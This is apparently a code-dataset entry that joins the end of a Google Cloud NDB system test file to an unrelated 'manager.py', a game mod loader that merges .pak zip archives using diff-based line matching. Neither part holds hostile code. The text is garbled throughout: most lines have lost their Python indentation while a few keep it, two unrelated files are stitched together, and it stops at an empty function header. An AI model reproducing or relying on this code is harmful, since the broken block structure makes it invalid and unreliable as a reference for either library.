key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
def test_insert_entity_with_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(foo=42, bar=OtherKind(one="hi", two="mom"))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
ds_entity = ds_client.get(key._key)
assert ds_entity["foo"] == 42
assert ds_entity["bar.one"] == "hi"
assert ds_entity["bar.two"] == "mom"
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND, entity_id, **{"foo": 42, "bar.one": "hi", "bar.two": "mom"}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar.one == "hi"
assert retrieved.bar.two == "mom"
assert isinstance(retrieved.bar, OtherKind)
@pytest.mark.usefixtures("client_context")
def test_retrieve_entity_with_legacy_repeated_structured_property(ds_entity):
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StructuredProperty(OtherKind, repeated=True)
entity_id = test_utils.system.unique_resource_id()
ds_entity(
KIND,
entity_id,
**{"foo": 42, "bar.one": ["hi", "hello"], "bar.two": ["mom", "dad"]}
)
key = ndb.Key(KIND, entity_id)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "hello"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
@pytest.mark.usefixtures("client_context")
def test_insert_expando(dispose_of):
class SomeKind(ndb.Expando):
foo = ndb.IntegerProperty()
entity = SomeKind(foo=42)
entity.expando_prop = "exp-value"
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.expando_prop == "exp-value"
@pytest.mark.usefixtures("client_context")
def test_insert_polymodel(dispose_of):
class Animal(ndb.PolyModel):
one = ndb.StringProperty()
class Feline(Animal):
two = ndb.StringProperty()
class Cat(Feline):
three = ndb.StringProperty()
entity = Cat(one="hello", two="dad", three="i'm in jail")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved, Animal)
assert isinstance(retrieved, Cat)
assert retrieved.one == "hello"
assert retrieved.two == "dad"
assert retrieved.three == "i'm in jail"
@pytest.mark.usefixtures("client_context")
def test_insert_autonow_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
entity = SomeKind(foo="bar")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.created_at, datetime.datetime)
assert isinstance(retrieved.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_insert_nested_autonow_property(dispose_of):
class OtherKind(ndb.Model):
created_at = ndb.DateTimeProperty(indexed=True, auto_now_add=True)
updated_at = ndb.DateTimeProperty(indexed=True, auto_now=True)
class SomeKind(ndb.Model):
other = ndb.StructuredProperty(OtherKind)
entity = SomeKind(other=OtherKind())
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.other.created_at, datetime.datetime)
assert isinstance(retrieved.other.updated_at, datetime.datetime)
@pytest.mark.usefixtures("client_context")
def test_uninitialized_property(dispose_of):
class SomeKind(ndb.Model):
foo = ndb.StringProperty(required=True)
entity = SomeKind()
with pytest.raises(ndb.exceptions.BadValueError):
entity.put()
@mock.patch(
"google.cloud.ndb._datastore_api.make_call",
mock.Mock(side_effect=Exception("Datastore shouldn't get called.")),
)
def test_crud_without_datastore(ds_entity, client_context):
entity_id = test_utils.system.unique_resource_id()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.StringProperty()
baz = ndb.StringProperty()
global_cache = global_cache_module._InProcessGlobalCache()
with client_context.new(global_cache=global_cache).use() as context:
context.set_global_cache_policy(None) # Use default
context.set_datastore_policy(False) # Don't use Datastore
key = ndb.Key(KIND, entity_id)
SomeKind(foo=42, bar="none", baz="night", _key=key).put()
entity = key.get()
assert isinstance(entity, SomeKind)
assert entity.foo == 42
assert entity.bar == "none"
assert entity.baz == "night"
key.delete()
assert key.get() is None
@pytest.mark.usefixtures("client_context")
def test_computed_key_property(dispose_of):
"""Regression test for #284.
https://github.com/googleapis/python-ndb/issues/284
"""
class AModel(ndb.Model):
s_foo = ndb.StringProperty()
class BModel(ndb.Model):
s_bar = ndb.StringProperty()
key_a = ndb.KeyProperty(kind="AModel", indexed=True)
class CModel(ndb.Model):
s_foobar = ndb.StringProperty()
key_b = ndb.KeyProperty(kind="BModel", indexed=True)
key_a = ndb.ComputedProperty( # Issue here
lambda self: self.key_b.get().key_a if self.key_b else None,
)
key_a = AModel(s_foo="test").put()
dispose_of(key_a._key)
key_b = BModel(s_bar="test", key_a=key_a).put()
dispose_of(key_b._key)
key_c = CModel(s_foobar="test", key_b=key_b).put()
dispose_of(key_c._key)
entity = key_c.get()
assert entity.key_a == key_a
assert entity.key_b == key_b
@pytest.mark.usefixtures("client_context")
def test_user_property(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
user = ndb.User("somebody@example.com", "gmail.com")
entity = SomeKind(user=user)
key = entity.put()
dispose_of(key._key)
    retrieved = key.get()
    assert retrieved.user.email() == "somebody@example.com"
    assert retrieved.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_user_property_different_user_class(dispose_of):
class SomeKind(ndb.Model):
user = ndb.UserProperty()
class User(object):
def email(self):
return "somebody@example.com"
def auth_domain(self):
return "gmail.com"
def user_id(self):
return None
entity = SomeKind(user=User())
key = entity.put()
dispose_of(key._key)
    retrieved = key.get()
    assert retrieved.user.email() == "somebody@example.com"
    assert retrieved.user.auth_domain() == "gmail.com"
@pytest.mark.usefixtures("client_context")
def test_repeated_empty_strings(dispose_of):
"""Regression test for issue # 300.
https://github.com/googleapis/python-ndb/issues/300
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty(repeated=True)
entity = SomeKind(foo=["", ""])
key = entity.put()
dispose_of(key._key)
    retrieved = key.get()
    assert retrieved.foo == ["", ""]
@pytest.mark.usefixtures("redis_context")
def test_multi_get_weirdness_with_redis(dispose_of):
"""Regression test for issue #294.
https://github.com/googleapis/python-ndb/issues/294
"""
class SomeKind(ndb.Model):
foo = ndb.StringProperty()
objects = [SomeKind(foo=str(i)) for i in range(10)]
keys = ndb.put_multi(objects)
for key in keys:
dispose_of(key._key)
ndb.get_multi(keys)
one_object = random.choice(keys).get()
one_object.foo = "CHANGED"
one_object.put()
objects_upd = ndb.get_multi(keys)
keys_upd = [obj.key for obj in objects_upd]
assert len(keys_upd) == len(keys)
assert len(set(keys_upd)) == len(set(keys))
assert set(keys_upd) == set(keys)
@pytest.mark.usefixtures("client_context")
def test_multi_with_lots_of_keys(dispose_of):
"""Regression test for issue #318.
https://github.com/googleapis/python-ndb/issues/318
"""
N = 1001
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
assert len(keys) == N
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
ndb.delete_multi(keys)
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_allocate_a_lot_of_keys():
N = 1001
class SomeKind(ndb.Model):
pass
keys = SomeKind.allocate_ids(N)
assert len(keys) == N
@pytest.mark.usefixtures("client_context")
def test_delete_multi_with_transactional(dispose_of):
"""Regression test for issue #271
https://github.com/googleapis/python-ndb/issues/271
"""
N = 10
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
@ndb.transactional()
def delete_them(entities):
ndb.delete_multi([entity.key for entity in entities])
foos = list(range(N))
entities = [SomeKind(foo=foo) for foo in foos]
keys = ndb.put_multi(entities)
dispose_of(*(key._key for key in keys))
entities = ndb.get_multi(keys)
assert [entity.foo for entity in entities] == foos
assert delete_them(entities) is None
entities = ndb.get_multi(keys)
assert entities == [None] * N
@pytest.mark.usefixtures("client_context")
def test_compressed_text_property(dispose_of, ds_client):
"""Regression test for #277
https://github.com/googleapis/python-ndb/issues/277
"""
class SomeKind(ndb.Model):
foo = ndb.TextProperty(compressed=True)
entity = SomeKind(foo="Compress this!")
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == "Compress this!"
ds_entity = ds_client.get(key._key)
assert zlib.decompress(ds_entity["foo"]) == b"Compress this!"
def test_insert_entity_with_repeated_local_structured_property_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #326
https://github.com/googleapis/python-ndb/issues/326
"""
class OtherKind(ndb.Model):
one = ndb.StringProperty()
two = ndb.StringProperty()
class SomeKind(ndb.Model):
foo = ndb.IntegerProperty()
bar = ndb.LocalStructuredProperty(OtherKind, repeated=True)
with client_context.new(legacy_data=True).use():
entity = SomeKind(
foo=42,
bar=[
OtherKind(one="hi", two="mom"),
OtherKind(one="and", two="dad"),
],
)
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert retrieved.foo == 42
assert retrieved.bar[0].one == "hi"
assert retrieved.bar[0].two == "mom"
assert retrieved.bar[1].one == "and"
assert retrieved.bar[1].two == "dad"
assert isinstance(retrieved.bar[0], OtherKind)
assert isinstance(retrieved.bar[1], OtherKind)
def test_insert_structured_property_with_unindexed_subproperty_legacy_data(
client_context, dispose_of, ds_client
):
"""Regression test for #341
https://github.com/googleapis/python-ndb/issues/341
"""
class OtherKind(ndb.Model):
data = ndb.BlobProperty(indexed=False)
class SomeKind(ndb.Model):
entry = ndb.StructuredProperty(OtherKind)
with client_context.new(legacy_data=True).use():
entity = SomeKind(entry=OtherKind(data=b"01234567890" * 1000))
key = entity.put()
dispose_of(key._key)
retrieved = key.get()
assert isinstance(retrieved.entry, OtherKind)
|
manager.py
|
import zipfile
import os
import sys
import struct
import difflib
import math
import time
import threading
import xml.etree.ElementTree as etree
import logging
import datetime
import traceback
def init_plog( log_folder_path, filename = None, format=None, datefmt = None, keep_logs=10 ):
logger = logging.getLogger()
if not os.path.isdir( log_folder_path ):
os.makedirs(log_folder_path)
datefmt = datefmt or '%Y-%m-%d ~ %H-%M-%S-%p'
log_folder = File( log_folder_path, [] )
log_file_path = filename or datetime.datetime.now().strftime( log_folder.filepath + '%Y-%m-%d ~ %H-%M-%S-%f' + '.log' )
while len( log_folder.contents ) >= keep_logs:
os.remove( log_folder.filepath + log_folder.contents.pop(0) )
format = format or '[%(asctime)-22s] : %(message)s'
logging.basicConfig( filename = os.sep.join( log_file_path.split(os.sep)[-2:] ), filemode = 'w', format = format, datefmt=datefmt, level=logging.DEBUG )
logging.captureWarnings(True)
#Debug Print
def dprint( msg, *args, end='\n' ):
    ''' Usage:
    >>> dprint( 'blah `3 be `3 dee `2 `1 sa `0.', 'ni', 'hi', 'bi', 'fly' )
    blah <class 'str'>( fly ) be <class 'str'>( fly ) dee <class 'str'>( bi ) <class 'str'>( hi ) sa <class 'str'>( ni ).
    '''
if args:
list = []
for arg in args:
list.append( arg )
msg = msg.split( '`' )
for i in range( len( msg ) ):
list_index = ''
char_list = [ char for char in msg[ i ] ]
for j in range( len( char_list ) ):
char = char_list[ j ]
if char.isdigit():
list_index += char_list.pop( j )
else:
break
msg[ i ] = ''.join( char_list )
if list_index:
list_index = int( list_index )
msg[ i-1 ] = str( msg[ i-1 ] ) + str( type( list[ list_index ] ) ) + '( ' + str( list[ list_index ] ) + ' )'
msg = ''.join( msg )
plog( msg, end=end )
else:
plog( '{0}({1})'.format( type(msg), msg ) )
def plog( msg, level=logging.INFO, end='\n', *args, **kwargs ):
if msg == '':
msg = ' '*100
logger = logging.getLogger()
logger.log( level, msg, *args, **kwargs )
if level >= logging.INFO :
print( '{0}{1}'.format( msg, ' '*100 ) , end = end )
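# Hedged usage sketch (illustration only, never called here): shows how the logging helpers
# above are meant to be wired together. init_plog() relies on the File helper defined
# elsewhere in this module; the folder name and messages are placeholders.
def _logging_demo():
    init_plog( 'logs', keep_logs=5 )                  # create ./logs and prune old .log files
    plog( 'manager started' )                         # INFO: written to the log and printed
    plog( 'verbose detail', level=logging.DEBUG )     # DEBUG: written to the log only
    dprint( 'loaded `0 mods', 3 )                     # debug-print with `N argument expansion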
def reindentXmlString( xmlToFix ):
xml = etree.fromstringlist( xmlToFix )
return etree.tostring(xml, encoding='utf-8', method='xml').decode()
def pop_str( str, index ):
try:
index = index % len(str)+1
except ZeroDivisionError:
index = 0
return str[:index-1] + str[index:]
def insert_str( str, index, value ):
try:
index = index % len(str)+1
except ZeroDivisionError:
index = 0
return str[:index-1] + value + str[index:]
class DiffCombiner( object ):
def __init__( self, diff_report_folder, original_game_file, mod_file, omni_mod_file, mod_pak_name, log_folder_path, accuracy, area_size ):
if diff_report_folder[-1] != os.sep:
diff_report_folder += os.sep
self.diff_report_folder = diff_report_folder
self.log_folder_path = log_folder_path
if self.log_folder_path[-1] != os.sep:
self.log_folder_path += os.sep
self.reindent = False
self.accuracy = accuracy
self.area_size = area_size
if self.area_size % 2 != 1:
self.area_size += 1
self.mod_pak_name = mod_pak_name.split(os.sep)[-1]
self.mod_file = mod_file
self.mod_file_path = self.mod_file.filepath
'''
#Makes sure every indentation is 4 spaces (as opposed to 1 space or 2 spaces)
if self.mod_file_path[-4:] == '.xml':
self.mod_file = reindentXmlString( self.mod_file ).splitlines( keepends=True )
'''
self.original_file = original_game_file.contents
'''
#Makes sure every indentation is 4 spaces (as opposed to 1 space or 2 spaces)
if self.mod_file_path[-4:] == '.xml':
self.original_file = reindentXmlString( self.original_file ).splitlines( keepends=True )
'''
self.omni_mod_file = omni_mod_file.contents
def diffs_to_folder( self ):
d = [ x for x in difflib.ndiff( self.original_file.split('\n') , self.mod_file.contents.split('\n') ) ]
if not os.path.exists(self.diff_report_folder):
os.makedirs(self.diff_report_folder)
if d:
            with open( '{0}diff_report{1}.txt'.format( self.diff_report_folder, len( os.listdir( self.diff_report_folder ) ) ), 'w' ) as diffile:
                diffile.write( '\n'.join( d ) )
return '\n'.join( d )
def similarity(self, str1, str2):
''' returns how similar two strings are as a percentage '''
sequence = difflib.SequenceMatcher(isjunk=None, a=str1, b=str2)
difference = sequence.ratio()*100
difference = round( difference, 1 )
return difference
def most_similar_to(self, str, list):
''' returns the index of the element in a list that is most similar to string '''
how_similar_most_similar_line_is = -1
most_similar_line_index = -1
for i in range( len( list ) ):
similarity = self.similarity( str, list[i] )
if similarity > how_similar_most_similar_line_is:
how_similar_most_similar_line_is = similarity
most_similar_line_index = i
if most_similar_line_index < 0:
plog( 'Something went terribly wrong in; DiffCombiner.most_similar_to(str, list).'\
'Please remove \'{0}\' from mods folder and file a bug report on nexus mods.'\
'Please remember to include your \'logs\' folder located in {1}.'.format( self.mod_pak_name, self.log_folder_path ) )
plog( 'most_similar_line_index = {0}.\nstr = {1}\nfile = {2}'.format( most_similar_line_index,
str,
self.mod_file.filepath ), level=logging.DEBUG )
input('Press Enter/Return to close...')
assert False
return most_similar_line_index
def find_top_matching_lines( self, line, file ):
similarities = [ {
'how_similar': -1,
'index': None
} ]
for i in range( len( file ) ):
similarity = self.similarity( line, file[ i ] )
if similarity >= similarities[ 0 ][ 'how_similar' ]:
similarities.insert( 0 ,
{
'how_similar': similarity,
'index': i
} )
if len( similarities ) > self.accuracy:
similarities.pop( -1 )
return similarities
def compare_areas( self, area1, area2 ):
if len(area1) != len(area2):
assert False, 'len( area1 ) and len( area2 ) must be of same size.'
similarities_list = [ ]
for i in range( len( area1 ) ):
similarities_list.append( self.similarity( area1[ i ], area2[ i ] ) )
return sum( similarities_list )
def most_similar_area( self, area, file ):
area_size = len( area )
if area_size % 2 != 1:
assert False, 'len( area ) MUST be odd.'
line = area[ math.floor( area_size/2 ) ]
top_matches = self.find_top_matching_lines( line, file )
best_area = {
'how_similar': -1,
'index': -1
}
for i in range( len( top_matches ) ):
match = top_matches[ i ]
match_line_number = match[ 'index' ]
if match_line_number is not None:
match_area = self.get_area( len( area ), file, match[ 'index' ] )
comp = self.compare_areas( area, match_area )
if comp >= best_area[ 'how_similar' ]:
best_area[ 'how_similar' ] = comp
best_area[ 'index' ] = match_line_number
return best_area[ 'index' ]
    ''' Takes an odd length list of lines as area and another list of lines as file and returns the middle point '''
'''
how_similar_most_similar_area_is = -1
most_similar_area_center_line_index = -1
if len(area) % 2 == 0:
plog( 'Something went terribly wrong in; DiffCombiner.most_similar_area(area, file), len(area) is even? what?'
'Please remove \'{0}\' from mods folder and file a bug report on nexus mods including:'\
'Please remember to include your \'logs\' folder located in {1}.'.format( self.mod_pak_name, self.log_folder_path ) )
plog( 'area = {0}.\file = {1}'.format( area, self.mod_file.filepath ), level=logging.DEBUG )
input('Press Enter/Return to close...')
assert False
for _ in range( math.floor( len(area)/2 ) ):
file.insert(0, ' ')
for _ in range( math.floor( len(area)/2 ) ):
file.append(' ')
for i in range(math.floor( len(area)/2 )+1, len(file) ):
diff_perc = [ -1 for _ in range( len( area ) ) ]
for line in file:
for j in range( len( area ) ):
aline = area[ j ]
diff_perc[ j ] = self.similarity(aline, line)
for j in range( 1, len( diff_perc ) ):
diff_perc[0] += diff_perc[ j ]
if diff_perc[0] > how_similar_most_similar_area_is:
how_similar_most_similar_area_is = diff_perc[0]
most_similar_area_center_line_index = i - math.floor( len(area)/2 )
return most_similar_area_center_line_index
'''
def get_area( self, area_size, file, line_number ):
file = file[:]
if area_size % 2 != 1:
assert False, 'area_size MUST be odd'
for _ in range( math.floor( area_size/2 )+1 ):
file.insert(0, ' ')
line_number += 1
for _ in range( math.floor( area_size/2 )+1 ):
file.append(' ')
area = []
for i in range( line_number - math.floor( area_size/2 ), line_number + math.floor( area_size/2 )+1 ):
area.append( file[ i ] )
return area
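        # Example: get_area(3, ['a', 'b', 'c', 'd'], 0) returns [' ', 'a', 'b'],
        # i.e. the requested line plus one (possibly padded) neighbour on each side.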
def combine(self):
diff_file = self.diffs_to_folder()
if self.omni_mod_file:
new_file = self.omni_mod_file
else:
new_file = self.original_file
diff = diff_file.split( '\n' )
new = new_file.split( '\n' )
omni = self.omni_mod_file.split( '\n' )
orig = self.original_file.split( '\n' )
mod = self.mod_file.contents.split( '\n' )
diff_blocks = [ ]
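        # difflib.ndiff prefixes every line with two characters: '- ' (removed),
        # '+ ' (added), '? ' (hint line) or '  ' (unchanged); that prefix is stripped
        # below and kept as the instruction for the block.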
for i in range( len( diff ) ):
line = diff[ i ]
try:
next_line = diff[ i+1 ]
except IndexError:
next_line = ' '
if line and ( line[ 0 ] == '-' or line[ 0 ] == '+' ):
line = [ char for char in line ]
instruction = line[ 0 ]
                for _ in range(2):
line.pop( 0 )
line = ''.join( line )
diff_blocks.append(
{ 'line_number': i, 'line': line, 'instruction': instruction, 'details': None }
)
if next_line and next_line[ 0 ] == '?':
                    for _ in range(2):
next_line = pop_str( next_line, 0 )
diff_blocks[ -1 ][ 'details' ] = next_line
for i in range( len( diff_blocks ) ):
block = diff_blocks[ i ]
bline = block[ 'line' ]
bline_number = block[ 'line_number' ]
instruction = block[ 'instruction' ]
details = block[ 'details' ]
if instruction == '-':
orig_area = self.get_area( self.area_size, orig, orig.index( bline ) )
olinei = self.most_similar_area( orig_area, new )
new.pop( olinei )
elif instruction == '+':
mod_area = self.get_area( self.area_size, mod, mod.index( bline ) )
mlinei = self.most_similar_area( mod_area, new )
new.insert( mlinei, bline )
return '\n'.join( new )
class PakFile( zipfile.ZipFile ):
def open(self, name, mode="r", pwd=None):
"""Return file-like object for 'name'."""
if mode not in ("r", "U", "rU"):
raise RuntimeError('open() requires mode "r", "U", or "rU"')
if 'U' in mode:
import warnings
warnings.warn("'U' mode is deprecated",
DeprecationWarning, 2)
if pwd and not isinstance(pwd, bytes):
raise TypeError("pwd: expected bytes, got %s" % type(pwd))
if not self.fp:
raise RuntimeError(
"Attempt to read ZIP archive that was already closed")
# Make sure we have an info object
if isinstance(name, zipfile.ZipInfo):
# 'name' is already an info object
zinfo = name
else:
# Get info object for name
zinfo = self.getinfo(name)
self._fileRefCnt += 1
zef_file = zipfile._SharedFile(self.fp, zinfo.header_offset, self._fpclose, self._lock)
try:
# Skip the file header:
fheader = zef_file.read(zipfile.sizeFileHeader)
if len(fheader) != zipfile.sizeFileHeader:
raise zipfile.BadZipFile("Truncated file header")
fheader = struct.unpack(zipfile.structFileHeader, fheader)
if fheader[zipfile._FH_SIGNATURE] != zipfile.stringFileHeader:
raise zipfile.BadZipFile("Bad magic number for file header")
fname = zef_file.read(fheader[zipfile._FH_FILENAME_LENGTH])
if fheader[zipfile._FH_EXTRA_FIELD_LENGTH]:
zef_file.read(fheader[zipfile._FH_EXTRA_FIELD_LENGTH])
if zinfo.flag_bits & 0x20:
# Zip 2.7: compressed patched data
raise NotImplementedError("compressed patched data (flag bit 5)")
if zinfo.flag_bits & 0x40:
# strong encryption
raise NotImplementedError("strong encryption (flag bit 6)")
if zinfo.flag_bits & 0x800:
# UTF-8 filename
fname_str = fname.decode("utf-8")
else:
fname_str = fname.decode("cp437")
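            # Normalize Windows-style backslash separators in the stored name so the
            # comparison with the central directory entry below does not fail.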
fname_str = '/'.join(fname_str.split('\\'))
if fname_str != zinfo.orig_filename:
raise zipfile.BadZipFile(
'File name in directory %r and header %r differ.'
% (zinfo.orig_filename, fname_str))
# check for encrypted flag & handle password
is_encrypted = zinfo.flag_bits & 0x1
zd = None
if is_encrypted:
if not pwd:
pwd = self.pwd
if not pwd:
raise RuntimeError("File %s is encrypted, password "
"required for extraction" % name)
zd = zipfile._ZipDecrypter(pwd)
# The first 12 bytes in the cypher stream is an encryption header
# used to strengthen the algorithm. The first 11 bytes are
# completely random, while the 12th contains the MSB of the CRC,
# or the MSB of the file time depending on the header type
# and is used to check the correctness of the password.
header = zef_file.read(12)
h = list(map(zd, header[0:12]))
if zinfo.flag_bits & 0x8:
# compare against the file type from extended local headers
check_byte = (zinfo._raw_time >> 8) & 0xff
else:
# compare against the CRC otherwise
check_byte = (zinfo.CRC >> 24) & 0xff
if h[11] != check_byte:
raise RuntimeError("Bad password for file", name)
return zipfile.ZipExtFile(zef_file, mode, zinfo, zd, True)
except:
zef_file.close()
raise
class FileContentsElement( object ):
def __init__( self, value ):
self.value = value
def __repr__( self ):
return str( self.value )
class FileContents( list ):
def __init__( self, items ):
        for item in items:
self.append( item )
def append(self, value):
list.append( self, FileContentsElement( value ) )
def __setitem__(self, index, value):
list.__setitem__( self, index, FileContentsElement( value ) )
class File( object ):
def __init__(self, filepath, contents, zip_path = None):
self.filepath = filepath
self.ext = self.filepath.split( '.' )[-1]
if os.path.isdir(self.filepath):
if self.filepath[-1] != os.sep:
self.filepath += os.sep
self.contents = sorted( os.listdir( self.filepath ) )
else:
self.contents = contents if self.ext != 'tbl' else ''
self.zip_path = zip_path
@property
def contents(self):
return self._contents
@contents.setter
def contents(self, value):
self._contents = value
def __repr__(self):
return 'FileObject: {0}'.format( self.filepath )
class Pak( object ):
def __init__(self, zip_path):
self.zip_path = zip_path
if not os.path.isfile( self.zip_path ):
ezip = b'PK\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
with open(self.zip_path, 'wb') as zip:
zip.write(ezip)
self.zip = PakFile( self.zip_path )
self.files = []
for member in self.zip.infolist():
if '.' in member.filename:
if member.filename[-4:] != '.tbl':
file_contents = self.zip.open( member.filename, 'r' )
file_contents = file_contents.readlines()
try:
if type( file_contents[0] ) == type( b'' ):
file_contents = b''.join( file_contents ).decode('latin-1')
else:
file_contents = ''.join( file_contents )
except IndexError:
file_contents = ''
else:
file_contents = ''
self.files.append( File( member.filename, file_contents, self.zip_path ) )
self.zip.close()
def __repr__(self):
str_list = []
str_list.append( ' ')
str_list.append(self.zip_path)
str_list.append( '---' + self.zip_path )
for file in self.files:
str_list.append( ' ' + str(file) )
str_list.append('---')
return '\n'.join(str_list)
def write(self, filename = None):
if filename == None:
filename = self.zip_path
new_zip = PakFile(self.zip_path, 'w')
for file in self.files:
file_contents = file.contents
try:
if type( file_contents[0] ) == type( b'' ):
file_contents = b''.join( file_contents ).decode('latin-1')
else:
file_contents = ''.join( file_contents )
except IndexError:
file_contents = ''
new_zip.writestr( file.filepath, file_contents )
new_zip.close()
class QuickPak( object ):
def __init__(self, zip_path):
self.zip_path = zip_path
if not os.path.isfile( self.zip_path ):
ezip = b'PK\x05\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
with open(self.zip_path, 'wb') as zip:
zip.write(ezip)
self.zip = PakFile( self.zip_path )
self.quick_folders = []
self.quick_folder_level = 3
for member in self.zip.infolist():
if '.' in member.filename:
quick_folder = member.filename.split('/')[ 0:self.quick_folder_level ]
                for i in range( len( quick_folder ) - 1, -1, -1 ):
if '.' in quick_folder[i]:
quick_folder.pop( i )
quick_folder = '/'.join( quick_folder )
if quick_folder and quick_folder not in self.quick_folders:
self.quick_folders.append( quick_folder )
class Manager( object ):
def __init__(self, game_files_filepath, mod_files_filepath, diff_report_folder, log_folder_path, load_order_path):
self.mod_files_filepath = mod_files_filepath
if self.mod_files_filepath[-1] != os.sep:
self.mod_files_filepath += os.sep
if not os.path.exists(self.mod_files_filepath):
os.makedirs(self.mod_files_filepath)
self.game_files_filepath = game_files_filepath
if self.game_files_filepath[-1] != os.sep:
self.game_files_filepath += os.sep
self.diff_report_folder = diff_report_folder
if self.diff_report_folder[-1] != os.sep:
self.diff_report_folder += os.sep
self.log_folder_path = log_folder_path
if self.log_folder_path[-1] != os.sep:
self.log_folder_path += os.sep
self.load_order_path = load_order_path
self.omni_mod_name = 'zzz_simple_mod_loader.pak'
self.omni_mod_path = self.game_files_filepath + self.omni_mod_name
self.lightning_search_dict = {
'Libs/Tables/rpg': [self.game_files_filepath + 'Tables.pak'],
'Libs/UI/UIActions': [self.game_files_filepath + 'GameData.pak']
}
self.quick_search_dict ={}
self.non_mergeable_types = [ 'tbl', 'dds' ]
self.mod_pak_paths = []
self.original_game_pak_paths = []
def populate_paks(self, sort = True):
self._populate_mod_pak_paths()
self._populate_original_game_pak_paths()
self._populate_quick_search()
if sort:
self._sort_mods_by_load_order()
def _file_to_pak(self, filepath, make_quick_pak = False):
pak = None
if( filepath[-4:] == '.pak' ):
if make_quick_pak:
pak = QuickPak( filepath )
else:
pak = Pak( filepath )
elif( filepath[-4:] == '.zip' ):
#TODO: if user.cfg is in the zip file; append contents to user.cfg
#TODO: if bin in zip file; go looking for user.cfg in bin/Win64
#TODO: if Localization is in .zip file; do localization stuff...
#TODO: if Data is in .zip file; recursively call '_populate_mod_paks' on the new "Data" folder.
#TODO: if Engine is in .zip file; recursively call '_populate_mod_paks' on Engine folder.
#TODO: if .pak is in .zip file; load in the .pak file.
pass
return pak
def _populate_mod_pak_paths(self):
plog('Getting mod paks.')
for filename in os.listdir( self.mod_files_filepath ):
if filename[-4:] == '.pak' or filename[-4:] == '.zip':
self.mod_pak_paths.append( self.mod_files_filepath + filename )
def _populate_original_game_pak_paths(self):
plog('Getting necessary game files.')
def get_all_game_pak_paths( fp = None ):
if fp == None:
fp = self.game_files_filepath
if fp[-1] != os.sep:
fp += os.sep
paks = []
for pak in os.listdir( fp ):
if os.path.isdir( fp + pak ):
#Recursively get all .pak files in the game files.
for gotten_pak in get_all_game_pak_paths( fp + pak ):
paks.append( gotten_pak )
elif '.pak' in pak and pak[0].lower() != 'z':
paks.append( fp + pak )
return paks
pak_paths = get_all_game_pak_paths()
needed_files = []
for filename in os.listdir( self.mod_files_filepath ):
if filename[-4:] == '.pak' or filename[-4:] == '.zip':
mod_pak = self._file_to_pak( self.mod_files_filepath + filename )
for file in mod_pak.files:
                    if file.filepath.lower() not in needed_files:
needed_files.append( file.filepath.lower() )
for pak_path in pak_paths:
if pak_path != self.omni_mod_path:
pak = PakFile( pak_path )
for member in pak.infolist():
if member.filename.lower() in needed_files:
self.original_game_pak_paths.append( pak_path )
pak.close()
def _populate_quick_search(self):
plog('Initializing Quick Search')
for original_game_pak_filepath in self.original_game_pak_paths:
original_game_pak = self._file_to_pak( original_game_pak_filepath, make_quick_pak = True )
for folder in original_game_pak.quick_folders:
                if folder not in self.quick_search_dict:
self.quick_search_dict[ folder ] = [ ]
self.quick_search_dict[ folder ].append( original_game_pak.zip_path )
def search( self, filepath, search_dict ):
quick_folder = '/'.join( filepath.split('/')[ 0:3 ] )
for path, paks in search_dict.items():
if path == quick_folder:
return paks
return None
def lightning_search(self, filepath):
plog( ' Performing Lightning Search for Pak Containing File: {0}'.format( filepath ) )
result = self.search( filepath, self.lightning_search_dict )
if result:
plog( ' Lightning Search Found Pak File.' )
plog( ' Looking for {0} in Pak File.'.format( filepath ) )
else:
plog( ' Lightning Search Failed.' )
return result
def quick_search(self, filepath):
